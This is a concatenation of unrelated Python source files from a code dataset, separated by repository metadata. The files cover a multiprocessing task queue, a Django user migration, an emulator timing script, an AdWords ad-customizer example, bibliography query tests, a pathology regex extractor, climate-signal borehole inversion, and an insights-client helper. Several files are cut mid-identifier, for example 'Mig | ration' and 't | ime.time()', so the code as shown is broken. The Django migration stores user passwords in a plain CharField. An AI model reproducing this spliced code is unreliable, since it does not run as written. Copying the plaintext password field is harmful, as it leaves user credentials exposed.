def run(self, data, *args, **kwargs):
if self._fn:
return self._fn(data, *args, **kwargs)
class Task(object):
"""
a multiprocess model of producer/consumer
"""
def __init__(self, fn,
producer_count=None,
consumer_count=None,
callback=None,
batch=True,
counter=None,
**shared
):
"""
init producer/consumer task
Args:
            fn: consumer function, called as func(data, counter, q_size, *args, **shared_vars)
            producer_count: producer process count, default: 1
            consumer_count: consumer process count, default: cpu_count - 1
            callback: callback func, called after fn completes
            batch: if True, `task.put(todo_list)` will process 'todo_list' all at once in batches;
                if False, todo_list will be processed one by one
            counter: process-shared counter; needs a custom implementation in <fn>
            **shared: process-shared object data
"""
cpus = cpu_count()
if producer_count is None or producer_count < 1 or producer_count > cpu_count():
producer_count = 1
if consumer_count is None or consumer_count < 1 or consumer_count > cpu_count():
consumer_count = cpus - 1
print 'producer_count=%s consumer_count=%s' % (producer_count, consumer_count)
self._callback = callback
self.batch = batch
manager = Manager()
self.q = manager.Queue()
self.lock = manager.Lock()
self.event = manager.Event()
self._counter = manager.Value('counter', counter or 0)
self._shared = {var_name: manager.Value(var_name, var_value) for var_name, var_value in shared.iteritems()}
self.producerProcessList = [Producer() for _ in xrange(producer_count)]
self.consumerProcessList = [Consumer(fn=fn) for _ in xrange(consumer_count)]
self.pool = ProcessPool(consumer_count + producer_count)
@property
def q_size(self):
return self.q.qsize() + sum([x.q_size or 0 for x in self.producerProcessList])
@property
def counter(self):
return self._counter.value
@property
def shared(self):
return {var_name: var_value_proxy.value for var_name, var_value_proxy in self._shared.iteritems()}
def put(self, todo_list):
producer = self.producerProcessList.pop(0)
if self.batch:
producer.put(todo_list)
else:
producer.put(*todo_list)
self.producerProcessList.append(producer)
time.sleep(0.01)
def run(self, *args, **kwargs):
results = []
arg = (self.q, self.lock, self.event, self._counter, self.q_size)
kwargs.update(self._shared)
for producer in self.producerProcessList:
self.pool.apply_async(producer, arg + args, kwargs)
for consumer in self.consumerProcessList:
results.append(self.pool.apply_async(consumer, arg + args, kwargs, self._cb))
return results
def _cb(self, *args, **kwargs):
if self._callback:
self._callback(self.counter, self._shared)
def finish(self):
for producer in self.producerProcessList:
producer.finish()
self.pool.close()
time.sleep(0.03)
self.event.set()
self.pool.join()
# def work(data, counter, *args, **kwargs):
# pid = os.getpid()
# print '%s doing %s' % (pid, data)
# # counter = args[0] if len(args) > 0 else None
# if counter:
# counter.value += 1
# kwargs['var_a'].value += chr(len(kwargs['var_a'].value) + 65)
# return '%s result' % pid
#
#
# def cb(*args, **kwargs):
# print 'callback', args, kwargs
#
#
# def test():
# import random
# n = 0
# task = Task(work, 1, 3, counter=n, var_a='', callback=cb)
# results = task.run()
# for i in xrange(26):
# lines = ["%d" % i] * random.randint(10, 20)
# task.put(lines)
#
# task.finish()
#
# print 'end counter', task.counter
# print 'shared.var_a', task.shared['var_a']
# print 'results:\n' + '\n'.join([str(res.get()) for res in results])
#
# if __name__ == '__main__':
# test()
|
meliora000/eb_django_app
|
django_eb/users/migrations/0001_initial.py
|
Python
|
mit
| 796
| 0.001256
|
# -*- coding: utf-8 -*-
# Generated by Django 1.
|
9 on 2015-12-30 01:33
from __future__ import unicode_literals
from django.db import migrations, models
class Mig
|
ration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='USER',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('userid', models.CharField(max_length=200)),
('userpassword', models.CharField(max_length=200)),
('add', models.CharField(max_length=200)),
('phone', models.CharField(max_length=200)),
],
),
]
|
mpeuster/son-emu
|
examples/performance_measurements/osm_component_startup.py
|
Python
|
apache-2.0
| 3,883
| 0.000258
|
#!/usr/bin/env python2
# Copyright (c) 2019 Erik Schilling
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import csv
import time
from emuvim.api.openstack.openstack_api_endpoint import OpenstackApiEndpoint
from emuvim.api.osm.kafka import Kafka
from emuvim.api.osm.lcm import LCM
from emuvim.api.osm.mongo import Mongo
from emuvim.api.osm.mysql import Mysql
from emuvim.api.osm.nbi import NBI
from emuvim.api.osm.ro import RO
from emuvim.api.osm.zookeeper import Zookeeper
from emuvim.dcemulator.net import DCNetwork
from mininet.log import setLogLevel
setLogLevel('debug')
COUNT = 15
with open('osm_component_startup_%d.csv' % time.time(), 'w') as csvfile:
fieldnames = ['other', 'zookeeper', 'kafka', 'mongo', 'nbi', 'ro_db', 'ro', 'lcm']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for i in range(COUNT):
start = time.time()
net = DCNetwork(monitor=False, enable_learning=True)
api = None
try:
dc1 = net.addDatacenter("dc1")
api = OpenstackApiEndpoint("0.0.0.0", 6001)
api.connect_datacenter(dc1)
api.connect_dc_network(net)
s1 = net.addSwitch('s1')
zookeeper_ip = '10.0.0.96'
kafka_ip = '10.0.0.97'
mongo_ip = '10.0.0.98'
nbi_ip = '10.0.0.99'
ro_db_ip = '10.0.0.100'
ro_ip = '10.0.0.101'
lcm_ip = '10.0.0.102'
d1 = net.addDocker('d1', dimage='ubuntu:trusty')
VERSION = 'releasefive-daily'
zookeeper = Zookeeper(net, zookeeper_ip)
kafka = Kafka(net, kafka_ip, zookeeper_ip)
mongo = Mongo(net, mongo_ip)
nbi = NBI(net, nbi_ip, mongo_ip, kafka_ip)
ro_db = Mysql(net, ro_db_ip)
ro = RO(net, ro_ip, ro_db_ip, version=VERSION)
lcm = LCM(net, lcm_ip, ro_ip, mongo_ip, kafka_ip)
net.addLink(d1, s1)
net.addLink(zookeeper.instance, s1)
net.addLink(kafka.instance, s1)
net.addLink(mongo.instance, s1)
net.addLink(nbi.instance, s1)
net.addLink(ro_db.instance, s1)
net.addLink(ro.instance, s1)
net.addLink(lcm.instance, s1)
net.start()
api.start()
other_end = time.time()
zookeeper.start()
zookeeper_started = time.time()
kafka.start()
kafka_started = time.time()
mongo.start()
mongo_started = time.time()
nbi.start()
nbi_started = time.time()
ro_db.start()
ro_db_started = time.time()
ro.start()
ro_started = t
|
ime.time()
lcm.start()
lcm_started = time.time()
|
writer.writerow({
'other': other_end - start,
'zookeeper': zookeeper_started - other_end,
'kafka': kafka_started - zookeeper_started,
'mongo': mongo_started - kafka_started,
'nbi': nbi_started - mongo_started,
'ro_db': ro_db_started - nbi_started,
'ro': ro_started - ro_db_started,
'lcm': lcm_started - ro_started,
})
csvfile.flush()
finally:
net.stop()
api.stop()
|
googleads/googleads-python-lib
|
examples/adwords/v201809/advanced_operations/add_ad_customizer.py
|
Python
|
apache-2.0
| 8,193
| 0.006713
|
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Adds an ad customizer feed.
Associates the feed with the customer and adds an ad that uses the feed to populate
dynamic data.
"""
from datetime import datetime
from uuid import uuid4
# Import appropriate classes from the client library.
from googleads import adwords
from googleads import errors
FEED_NAME = 'Interplanetary Feed Name %s' % uuid4()
ADGROUPS = [
'INSERT_ADGROUP_ID_1_HERE',
'INSERT_ADGROUP_ID_2_HERE'
]
def CreateAdsWithCustomizations(client, adgroup_ids, feed_name):
"""Creates ExpandedTextAds that use ad customizations for specified AdGroups.
Args:
client: an AdWordsClient instance.
adgroup_ids: a list containing the AdGroup ids to add ExpandedTextAds to.
feed_name: the name of the feed used to apply customizations.
Raises:
GoogleAdsError: if no ExpandedTextAds were added.
"""
# Get the AdGroupAdService
adgroup_ad_service = client.GetService('AdGroupAdService', 'v201809')
expanded_text_ad = {
'xsi_type': 'ExpandedTextAd',
'headlinePart1': 'Luxury Cruise to {=%s.Name}' % feed_name,
'headlinePar
|
t2': 'Only {=%s.Price}' % feed_name,
'description': 'Offer ends in {=countdown(%s.Date)}!' % feed_name,
'finalUrls': ['http://www.exam
|
ple.com'],
}
# We add the same ad to both ad groups. When they serve, they will show
# different values, since they match different feed items.
operations = [{
'operator': 'ADD',
'operand': {
'adGroupId': adgroup,
'ad': expanded_text_ad
}
} for adgroup in adgroup_ids]
response = adgroup_ad_service.mutate(operations)
if response and 'value' in response:
for ad in response['value']:
print('Created an ad with ID "%s", type "%s", and status "%s".'
% (ad['ad']['id'], ad['ad']['Ad.Type'], ad['status']))
else:
raise errors.GoogleAdsError('No ads were added.')
def CreateCustomizerFeed(client, feed_name):
"""Creates a new AdCustomizerFeed.
Args:
client: an AdWordsClient instance.
feed_name: the name for the new AdCustomizerFeed.
Returns:
The new AdCustomizerFeed.
"""
# Get the AdCustomizerFeedService
ad_customizer_feed_service = client.GetService('AdCustomizerFeedService',
'v201809')
customizer_feed = {
'feedName': feed_name,
'feedAttributes': [
{'type': 'STRING', 'name': 'Name'},
{'type': 'STRING', 'name': 'Price'},
{'type': 'DATE_TIME', 'name': 'Date'}
]
}
feed_service_operation = {
'operator': 'ADD',
'operand': customizer_feed
}
response = ad_customizer_feed_service.mutate([feed_service_operation])
if response and 'value' in response:
feed = response['value'][0]
feed_data = {
'feedId': feed['feedId'],
'nameId': feed['feedAttributes'][0]['id'],
'priceId': feed['feedAttributes'][1]['id'],
'dateId': feed['feedAttributes'][2]['id']
}
    print('Feed with name "%s" and ID %s was added with:\n'
          '\tName attribute ID %s and price attribute ID %s and date attribute '
          'ID %s' % (feed['feedName'], feed['feedId'], feed_data['nameId'],
                     feed_data['priceId'], feed_data['dateId']))
return feed
else:
raise errors.GoogleAdsError('No feeds were added')
def RestrictFeedItemToAdGroup(client, feed_item, adgroup_id):
"""Restricts the feed item to an ad group.
Args:
client: an AdWordsClient instance.
feed_item: The feed item.
adgroup_id: The ad group ID.
"""
# Get the FeedItemTargetService
feed_item_target_service = client.GetService(
'FeedItemTargetService', 'v201809')
# Optional: Restrict the first feed item to only serve with ads for the
# specified ad group ID.
ad_group_target = {
'xsi_type': 'FeedItemAdGroupTarget',
'feedId': feed_item['feedId'],
'feedItemId': feed_item['feedItemId'],
'adGroupId': adgroup_id
}
operation = {'operator': 'ADD', 'operand': ad_group_target}
response = feed_item_target_service.mutate([operation])
new_ad_group_target = response['value'][0]
print('Feed item target for feed ID %s and feed item ID %s was created to '
'restrict serving to ad group ID %s' %
(new_ad_group_target['feedId'],
new_ad_group_target['feedItemId'],
new_ad_group_target['adGroupId']))
def CreateCustomizerFeedItems(client, adgroup_ids, ad_customizer_feed):
"""Creates FeedItems for the specified AdGroups.
These FeedItems contain values to use in ad customizations for the AdGroups.
Args:
client: an AdWordsClient instance.
adgroup_ids: a list containing two AdGroup Ids.
ad_customizer_feed: the AdCustomizerFeed we're associating the FeedItems
with.
Raises:
GoogleAdsError: if no FeedItems were added.
"""
# Get the FeedItemService
feed_item_service = client.GetService('FeedItemService', 'v201809')
now = datetime.now()
mars_date = datetime(now.year, now.month, 1, 0, 0)
venus_date = datetime(now.year, now.month, 15, 0, 0)
time_format = '%Y%m%d %H%M%S'
feed_item_operations = [
CreateFeedItemAddOperation(
'Mars', '$1234.56', mars_date.strftime(time_format),
ad_customizer_feed),
CreateFeedItemAddOperation(
'Venus', '$1450.00', venus_date.strftime(time_format),
ad_customizer_feed)
]
response = feed_item_service.mutate(feed_item_operations)
if 'value' in response:
for feed_item in response['value']:
print('Added FeedItem with ID %d.' % feed_item['feedItemId'])
else:
raise errors.GoogleAdsError('No FeedItems were added.')
for feed_item, adgroup_id in zip(response['value'], adgroup_ids):
RestrictFeedItemToAdGroup(client, feed_item, adgroup_id)
def CreateFeedItemAddOperation(name, price, date, ad_customizer_feed):
"""Creates a FeedItemOperation.
The generated FeedItemOperation will create a FeedItem with the specified
values when sent to FeedItemService.mutate.
Args:
name: the value for the name attribute of the FeedItem.
price: the value for the price attribute of the FeedItem.
date: the value for the date attribute of the FeedItem.
ad_customizer_feed: the AdCustomizerFeed we're associating the FeedItems
with.
Returns:
A new FeedItemOperation for adding a FeedItem.
"""
feed_item = {
'feedId': ad_customizer_feed['feedId'],
'attributeValues': [
{
'feedAttributeId': ad_customizer_feed['feedAttributes'][0]['id'],
'stringValue': name
},
{
'feedAttributeId': ad_customizer_feed['feedAttributes'][1]['id'],
'stringValue': price
},
{
'feedAttributeId': ad_customizer_feed['feedAttributes'][2]['id'],
'stringValue': date
}
]
}
operation = {
'operator': 'ADD',
'operand': feed_item
}
return operation
def main(client, adgroup_ids, feed_name=FEED_NAME):
# Create a customizer feed. One feed per account can be used for all ads.
ad_customizer_feed = CreateCustomizerFeed(client, feed_name)
# Add feed items containing the values we'd like to place in ads.
CreateCustomizerFeedItems(client, adgroup_ids, ad_customizer_feed)
# All set! We can now create ads with customizations.
CreateAdsWithCustomizations(client, adgroup_ids, feed_name)
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_clien
|
pubs/pubs
|
tests/test_queries.py
|
Python
|
lgpl-3.0
| 9,022
| 0.001331
|
# coding: utf8
from __future__ import unicode_literals
import unittest
import dotdot
from pubs.query import (AuthorFilter, CitekeyFilter, FieldFilter,
YearFilter, _query_block_to_filter,
get_paper_filter, InvalidQuery)
from pubs.paper import Paper
import fixtures
doe_paper = Paper.from_bibentry(fixtures.doe_bibentry)
page_paper = Paper.from_bibentry(fixtures.page_bibentry)
turing_paper = Paper.from_bibentry(fixtures.turing_bibentry,
metadata=fixtures.turing_metadata)
class TestAuthorFilter(unittest.TestCase):
def test_fails_if_no_author(self):
no_doe = doe_paper.deepcopy()
no_doe.bibentry['Doe2013']['author'] = []
self.assertFalse(AuthorFilter('whatever')(no_doe))
def test_match_case(self):
self.assertTrue(AuthorFilter('doe')(doe_paper))
self.assertTrue(AuthorFilter('doe', case_sensitive=False)(doe_paper))
self.assertTrue(AuthorFilter('Doe')(doe_paper))
def test_do_not_match_case(self):
self.assertFalse(AuthorFilter('dOe')(doe_paper))
self.assertFalse(AuthorFilter('dOe', case_sensitive=True)(doe_paper))
self.assertFalse(AuthorF
|
ilter('doe', case_sensitive=True)(doe_paper))
self.assertTrue(AuthorFilter('dOe', case_sensitive=False)(doe_paper))
def test_match_not_first_author(self):
self.assertTrue(A
|
uthorFilter('motwani')(page_paper))
def test_do_not_match_first_name(self):
self.assertFalse(AuthorFilter('lawrence')(page_paper))
class TestCitekeyFilter(unittest.TestCase):
def test_fails_if_no_citekey(self):
no_citekey = doe_paper.deepcopy()
no_citekey.citekey = ''
self.assertFalse(CitekeyFilter('whatever')(no_citekey))
def test_match_case(self):
self.assertTrue(CitekeyFilter('doe201')(doe_paper))
self.assertTrue(CitekeyFilter('doe201', case_sensitive=False)(doe_paper))
self.assertTrue(CitekeyFilter('Doe201')(doe_paper))
def test_do_not_match_case(self):
self.assertFalse(CitekeyFilter('dOe201')(doe_paper))
self.assertFalse(CitekeyFilter('dOe201', case_sensitive=True)(doe_paper))
self.assertFalse(CitekeyFilter('doe201', case_sensitive=True)(doe_paper))
self.assertTrue(CitekeyFilter('dOe201', case_sensitive=False)(doe_paper))
def test_latex_enc(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "{G}r{\\\"u}n2013"
self.assertTrue(CitekeyFilter('Grün')(latexenc_paper))
self.assertTrue(CitekeyFilter('Gr{\\\"u}n')(latexenc_paper))
def test_normalize_unicode(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "Jalape\u00f1o2013"
self.assertTrue(CitekeyFilter("Jalapen\u0303o")(latexenc_paper))
def test_strict(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "Jalape\u00f1o2013"
self.assertFalse(CitekeyFilter("Jalapen\u0303o", strict=True)(latexenc_paper))
latexenc_paper.citekey = "{G}ros2013"
self.assertFalse(CitekeyFilter("Gros", strict=True)(latexenc_paper))
def test_strict_implies_case(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "Gros2013"
self.assertFalse(
CitekeyFilter("gros", case_sensitive=False, strict=True)(latexenc_paper))
class TestCheckTag(unittest.TestCase):
pass
class TestCheckYear(unittest.TestCase):
def test_single_year(self):
self.assertTrue(YearFilter('2013')(doe_paper))
self.assertFalse(YearFilter('2014')(doe_paper))
def test_before_year(self):
self.assertTrue(YearFilter('-2013')(doe_paper))
self.assertTrue(YearFilter('-2014')(doe_paper))
self.assertFalse(YearFilter('-2012')(doe_paper))
def test_after_year(self):
self.assertTrue(YearFilter('2013-')(doe_paper))
self.assertTrue(YearFilter('2012-')(doe_paper))
self.assertFalse(YearFilter('2014-')(doe_paper))
def test_year_range(self):
self.assertTrue(YearFilter('')(doe_paper))
self.assertTrue(YearFilter('-')(doe_paper))
self.assertTrue(YearFilter('2013-2013')(doe_paper))
self.assertTrue(YearFilter('2012-2014')(doe_paper))
self.assertFalse(YearFilter('2014-2015')(doe_paper))
with self.assertRaises(ValueError):
YearFilter('2015-2014')(doe_paper)
class TestCheckField(unittest.TestCase):
def test_match_case(self):
self.assertTrue(FieldFilter('title', 'nice')(doe_paper))
self.assertTrue(
FieldFilter('title', 'nice', case_sensitive=False)(doe_paper))
self.assertTrue(FieldFilter('year', '2013')(doe_paper))
def test_do_not_match_case(self):
self.assertTrue(
FieldFilter('title', 'Title', case_sensitive=True)(doe_paper))
self.assertFalse(
FieldFilter('title', 'nice', case_sensitive=True)(doe_paper))
def test_latex_enc(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "{G}r{\\\"u}n"
self.assertTrue(
FieldFilter('title', 'Grün')(latexenc_paper))
self.assertTrue(
FieldFilter('title', 'Gr{\\\"u}n')(latexenc_paper))
def test_normalize_unicode(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "Jalape\u00f1o"
self.assertTrue(
FieldFilter('title', "Jalapen\u0303o")(latexenc_paper))
def test_strict(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "Jalape\u00f1o"
self.assertFalse(FieldFilter('title', "Jalapen\u0303o",
strict=True)(latexenc_paper))
latexenc_paper.bibentry['Doe2013']['title'] = "{G}ros"
self.assertFalse(
FieldFilter('title', "Gros", strict=True)(latexenc_paper))
def test_strict_implies_case(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "Gros"
self.assertFalse(
FieldFilter('title', "gros", case_sensitive=False,
strict=True)(latexenc_paper))
class TestCheckQueryBlock(unittest.TestCase):
def test_raise_invalid_if_no_value(self):
with self.assertRaises(InvalidQuery):
_query_block_to_filter('title')
def test_raise_invalid_if_too_much(self):
with self.assertRaises(InvalidQuery):
_query_block_to_filter('whatever:value:too_much')
class TestFilterPaper(unittest.TestCase):
def test_case(self):
self.assertTrue(get_paper_filter(['title:nice'])(doe_paper))
self.assertTrue(get_paper_filter(['title:Nice'])(doe_paper))
self.assertFalse(get_paper_filter(['title:nIce'])(doe_paper))
def test_fields(self):
self.assertTrue(get_paper_filter(['year:2013'])(doe_paper))
self.assertTrue(get_paper_filter(['year:2010-'])(doe_paper))
self.assertFalse(get_paper_filter(['year:2014'])(doe_paper))
self.assertTrue(get_paper_filter(['author:doe'])(doe_paper))
self.assertTrue(get_paper_filter(['author:Doe'])(doe_paper))
def test_tags(self):
self.assertTrue(get_paper_filter(['tag:computer'])(turing_paper))
self.assertFalse(get_paper_filter(['tag:Ai'])(turing_paper))
self.assertTrue(get_paper_filter(['tag:AI'])(turing_paper))
self.assertTrue(get_paper_filter(['tag:ai'])(turing_paper))
def test_multiple(self):
self.assertTrue(get_paper_filter(['author:doe', 'year:2013'])(doe_paper))
self.assertTrue(get_paper_filter(['author:doe', 'year:2010-2014'])(doe_paper))
self.assertFalse(get_paper_filter(['author:doe', 'year:2014-'])(doe_paper))
self.assertFalse(get_paper_filter(['author:doee', 'year:2014'])(doe_paper))
def test_latex_enc(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = r"{E}l Ni{\~n}o"
latexenc_paper.bibentry['Doe2013']['author'][0] = r"Erd\H{o}s,
|
esilgard/BreastMR
|
fhcrc_pathology/Pathologist.py
|
Python
|
apache-2.0
| 744
| 0.005376
|
'''author@esilgard'''
#
# Copyright (c) 2014-2016 Fred Hutchinson Cancer Research Center
#
# Licensed under the Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
#
from OneFieldPerReport import OneFieldPerReport
import glo
|
bal_strings as gb
class Pathologist(OneFieldPerReport):
''' extract the name of the pathologist who initially signed the report '''
__version__ = 'Pathologist1.0'
def __init__(self):
super(Pathologist, self).__init__()
self.field_name = 'Pathologist'
self.regex = r'\n([A-Za-z\'\-,. ]+) MD(, PhD)?[ ]*\n[ ]*Pathologist[ ]*\n'
self.confidence = 1
self.match_style = 'first'
|
self.table = gb.PATHOLOGY_TABLE
self.value_type = 'match'
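# A small, self-contained sketch of how the signature regex above behaves. The
# report footer text is fabricated purely for illustration and the helper is not
# used by the extraction pipeline.
def _demo_pathologist_regex():
    """Apply the signature pattern to a made-up report footer."""
    import re
    pattern = r"\n([A-Za-z'\-,. ]+) MD(, PhD)?[ ]*\n[ ]*Pathologist[ ]*\n"
    sample = '\nSmith, Jane Q. MD, PhD\n Pathologist \n'
    match = re.search(pattern, sample)
    return match.group(1) if match else None  # expected: 'Smith, Jane Q.'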
|
eusoubrasileiro/fatiando_seismic
|
fatiando/geothermal/climsig.py
|
Python
|
bsd-3-clause
| 7,793
| 0
|
r"""
Modeling and inversion of temperature residuals measured in wells due to
temperature perturbations at the surface.
Perturbations can be of two kinds: **abrupt** or **linear**.
Forward modeling of these types of changes is done with functions:
* :func:`~fatiando.geothermal.climsig.abrupt`
* :func:`~fatiando.geothermal.climsig.linear`
Assuming that the temperature perturbation was abrupt, the residual
temperature at a depth :math:`z_i` in the well at a time :math:`t` after the
perturbation is given by
.. math::
T_i(z_i) = A \left[1 - \mathrm{erf}\left(
\frac{z_i}{\sqrt{4\lambda t}}\right)\right]
where :math:`A` is the amplitude of the perturbation, :math:`\lambda` is the
thermal diffusivity of the medium, and :math:`\mathrm{erf}` is the error
function.
For the case of a linear change, the temperature is
.. math::
T_i(z_i) = A \left[
\left(1 + 2\frac{z_i^2}{4\lambda t}\right)
\mathrm{erfc}\left(\frac{z_i}{\sqrt{4\lambda t}}\right) -
\frac{2}{\sqrt{\pi}}\left(\frac{z_i}{\sqrt{4\lambda t}}\right)
\mathrm{exp}\left(-\frac{z_i^2}{4\lambda t}\right)
\right]
Given the temperature measured at different depths, we can **inver
|
t** for the
amplitude and age of the change. The available inversion solvers are:
* :class:`~fa
|
tiando.geothermal.climsig.SingleChange`: inverts for the
parameters of a single temperature change. Can use both abrupt and linear
models.
----
"""
from __future__ import division
import numpy
import scipy.special
from ..inversion.base import Misfit
from ..constants import THERMAL_DIFFUSIVITY_YEAR
def linear(amp, age, zp, diffus=THERMAL_DIFFUSIVITY_YEAR):
"""
Calculate the residual temperature profile in depth due to a linear
temperature perturbation.
Parameters:
* amp : float
Amplitude of the perturbation (in C)
* age : float
        Time since the perturbation occurred (in years)
* zp : array
The depths of computation points along the well (in meters)
* diffus : float
Thermal diffusivity of the medium (in m^2/year)
See the default values for the thermal diffusivity in
:mod:`fatiando.constants`.
Returns
* temp : array
The residual temperatures measured along the well
"""
tmp = zp / numpy.sqrt(4. * diffus * age)
res = amp * ((1. + 2 * tmp ** 2) * scipy.special.erfc(tmp)
- 2. / numpy.sqrt(numpy.pi) * tmp * numpy.exp(-tmp ** 2))
return res
def abrupt(amp, age, zp, diffus=THERMAL_DIFFUSIVITY_YEAR):
"""
Calculate the residual temperature profile in depth due to an abrupt
temperature perturbation.
Parameters:
* amp : float
Amplitude of the perturbation (in C)
* age : float
        Time since the perturbation occurred (in years)
    * zp : array
        Array with the depths of computation points along the well (in meters)
* diffus : float
Thermal diffusivity of the medium (in m^2/year)
See the default values for the thermal diffusivity in
:mod:`fatiando.constants`.
Returns
* temp : array
The residual temperatures measured along the well
"""
return amp * (1. - scipy.special.erf(zp / numpy.sqrt(4. * diffus * age)))
class SingleChange(Misfit):
r"""
Invert the well temperature data for a single change in temperature.
The parameters of the change are its amplitude and age.
See the docstring of :mod:`fatiando.geothermal.climsig` for more
information and examples.
Parameters:
* temp : array
The temperature profile
* zp : array
Depths along the profile
* mode : string
The type of change: ``'abrupt'`` for an abrupt change, ``'linear'`` for
a linear change.
* diffus : float
Thermal diffusivity of the medium (in m^2/year)
.. note::
The recommended solver for this inverse problem is the
        Levenberg-Marquardt method. Since this is a non-linear problem, set the
        desired method and initial solution using the
        :meth:`~fatiando.inversion.base.FitMixin.config` method.
        See the example below.
Example with synthetic data:
>>> import numpy
>>> zp = numpy.arange(0, 100, 1)
>>> # For an ABRUPT change
>>> amp = 2
>>> age = 100 # Uses years to avoid overflows
>>> temp = abrupt(amp, age, zp)
>>> # Run the inversion for the amplitude and time
    >>> # This is a non-linear problem, so use the Levenberg-Marquardt
>>> # algorithm with an initial estimate
>>> solver = SingleChange(temp, zp, mode='abrupt').config(
... 'levmarq', initial=[1, 1])
>>> amp_, age_ = solver.fit().estimate_
>>> print "amp: %.2f age: %.2f" % (amp_, age_)
amp: 2.00 age: 100.00
>>> # For a LINEAR change
>>> amp = 3.45
>>> age = 52.5
>>> temp = linear(amp, age, zp)
>>> solver = SingleChange(temp, zp, mode='linear').config(
... 'levmarq', initial=[1, 1])
>>> amp_, age_ = solver.fit().estimate_
>>> print "amp: %.2f age: %.2f" % (amp_, age_)
amp: 3.45 age: 52.50
Notes:
For **abrupt** changes, derivatives with respect to the amplitude and age
are calculated using the formula
.. math::
\frac{\partial T_i}{\partial A} = 1 - \mathrm{erf}\left(
\frac{z_i}{\sqrt{4\lambda t}}\right)
and
.. math::
\frac{\partial T_i}{\partial t} = \frac{A}{t\sqrt{\pi}}
\left(\frac{z_i}{\sqrt{4\lambda t}}\right)
\exp\left[-\left(\frac{z_i}{\sqrt{4\lambda t}}\right)^2\right]
respectively.
For **linear** changes, derivatives with respect to the age are calculated
using a 2-point finite difference approximation. Derivatives with respect
    to amplitude are calculated using the formula
.. math::
\frac{\partial T_i}{\partial A} =
\left(1 + 2\frac{z_i^2}{4\lambda t}\right)
\mathrm{erfc}\left(\frac{z_i}{\sqrt{4\lambda t}}\right) -
\frac{2}{\sqrt{\pi}}\left(\frac{z_i}{\sqrt{4\lambda t}}\right)
\mathrm{exp}\left(-\frac{z_i^2}{4\lambda t}\right)
"""
def __init__(self, temp, zp, mode, diffus=THERMAL_DIFFUSIVITY_YEAR):
if len(temp) != len(zp):
raise ValueError("temp and zp must be of same length")
if mode not in ['abrupt', 'linear']:
raise ValueError("Invalid mode: %s. Must be 'abrupt' or 'linear'"
% (mode))
super(SingleChange, self).__init__(
data=temp,
positional=dict(zp=zp),
model=dict(diffus=float(diffus), mode=mode),
nparams=2, islinear=False)
def _get_predicted(self, p):
amp, age = p
zp = self.positional['zp']
diffus = self.model['diffus']
if self.model['mode'] == 'abrupt':
return abrupt(amp, age, zp, diffus)
if self.model['mode'] == 'linear':
return linear(amp, age, zp, diffus)
def _get_jacobian(self, p):
amp, age = p
zp = self.positional['zp']
diffus = self.model['diffus']
mode = self.model['mode']
if mode == 'abrupt':
tmp = zp / numpy.sqrt(4. * diffus * age)
jac = numpy.transpose([
abrupt(1., age, zp, diffus),
(amp * tmp * numpy.exp(-(tmp ** 2)) /
(numpy.sqrt(numpy.pi) * age))])
if mode == 'linear':
delta = 0.5
at_p = linear(amp, age, zp, diffus)
jac = numpy.transpose([
linear(1., age, zp, diffus),
(linear(amp, age + delta, zp, diffus) -
linear(amp, age - delta, zp, diffus)) / (2 * delta)])
return jac
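# A small, optional cross-check of the analytic age derivative used for the
# abrupt model in SingleChange._get_jacobian, compared against a central finite
# difference. It only uses objects defined in this module, the parameter values
# are illustrative, and nothing calls it.
def _check_abrupt_age_derivative(amp=2.0, age=100.0, delta=1e-3):
    """Return the largest gap between analytic and numeric d(abrupt)/d(age)."""
    zp = numpy.arange(0., 100., 1.)
    tmp = zp / numpy.sqrt(4. * THERMAL_DIFFUSIVITY_YEAR * age)
    analytic = amp * tmp * numpy.exp(-(tmp ** 2)) / (numpy.sqrt(numpy.pi) * age)
    numeric = (abrupt(amp, age + delta, zp) -
               abrupt(amp, age - delta, zp)) / (2 * delta)
    return numpy.max(numpy.abs(analytic - numeric))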
|
wcmitchell/insights-core
|
insights/client/auto_config.py
|
Python
|
apache-2.0
| 7,561
| 0.000265
|
"""
Auto Configuration Helper
"""
import logging
import os
import requests
from urlparse import urlparse
from constants import InsightsConstants as constants
from cert_auth import rhsmCertificate
from connection import InsightsConnection
from config import CONFIG as config
logger = logging.getLogger(__name__)
APP_NAME = constants.app_name
def verify_connectivity():
"""
Verify connectivity to satellite server
"""
logger.debug("Verifying Connectivity")
ic = InsightsConnection()
try:
branch_info = ic.branch_info()
except requests.ConnectionError as e:
logger.debug(e)
logger.debug("Failed to connect to satellite")
return False
except LookupError as e:
logger.debug(e)
logger.debug("Failed to parse response from satellite")
return False
try:
remote_leaf = branch_info['remote_leaf']
return remote_leaf
except LookupError as e:
